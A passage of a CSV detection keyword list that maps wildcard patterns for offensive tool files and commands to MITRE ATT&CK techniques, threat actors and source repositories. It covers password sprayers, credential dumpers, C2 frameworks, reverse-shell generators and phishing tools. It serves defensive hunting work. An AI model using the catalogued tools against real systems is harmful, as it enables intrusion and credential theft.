Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,1,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*mshta/shellcode_inject*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*MSHTAStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*msLDAPDump.py*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*MSOfficeManipulator.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*msol_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*MSOLSpray *,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dafthack/MSOLSpray,1,0,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*MSOLSpray.git*,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation 
tools,https://github.com/dafthack/MSOLSpray,1,1,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*MSOLSpray.ps1*,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dafthack/MSOLSpray,1,1,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*MSOLSpray-master*,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dafthack/MSOLSpray,1,1,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*mspass.exe*,offensive_tool_keyword,mspass,MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/mspass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*mspass.zip*,offensive_tool_keyword,mspass,MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. 
You cannot use this utility for grabbing the passwords of other users.,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/mspass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*msquic_openssl/msquic.dll*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*msquic_openssl/msquic.lib*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*MS-RPNVulnerableDC.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*MS-RPRN.exe *,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. 
Binary from here https://github.com/leechristensen/SpoolSample,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*MS-RPRN.exe \\* \\*/pipe/pwned*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*mssgbox_shellcode_arranged_x64.b64*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_exitfunc_thread_x64.bin*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64.b64*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64.bin*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or 
beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64.bin*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64_with_hexsymbol.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64_without_hexsymbol.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssql_brute.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mssql_local_auth_bypass.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mssql_local_hashdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mssqlattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z 
-*mssqlattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*mssqlproxy-master*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*mssqlrelayclient.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*mssqlrelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*mssqlsvc.kirbi*,offensive_tool_keyword,AD exploitation cheat sheet,Crack with TGSRepCrack,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A 
-*mthbernardes*rsg*,offensive_tool_keyword,rsg,A tool to generate various ways to do a reverse shell,T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007,TA0002 - TA0011 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/mthbernardes/rsg,1,1,N/A,N/A,6,541,133,2023-04-27T10:32:21Z,2017-12-12T02:57:07Z -*mttaggart/OffensiveNotion*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*multi_meter_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*multi_vendor_cctv_dvr_pass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*multibit2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*MultiPotato.cpp*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*MultiPotato.exe*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*MultiPotato-main*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*--mutator N*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z 
-*mutator.py *,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*mvelazc0/BadZure*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*mwrlabs*,offensive_tool_keyword,Github Username,used to be a malware repo aso hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/mwrlabs,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*-my.sharepoint.com/personal/Fakeuser*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*-my.sharepoint.com/personal/TESTUSER_*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*my_dump_my_pe*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*myreallycooltotallyrealtenant.onmicrosoft.com*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*myseatbelt.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*mysql -u* -p c2 < c2_sample.sql*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z 
-*mysql_authbypass_hashdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mysql_file_enum.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mysql_hashdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mysql-privesc-race.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*Mystikal-main*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*mythic_c2_container*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_nginx*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_payloadtype*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - 
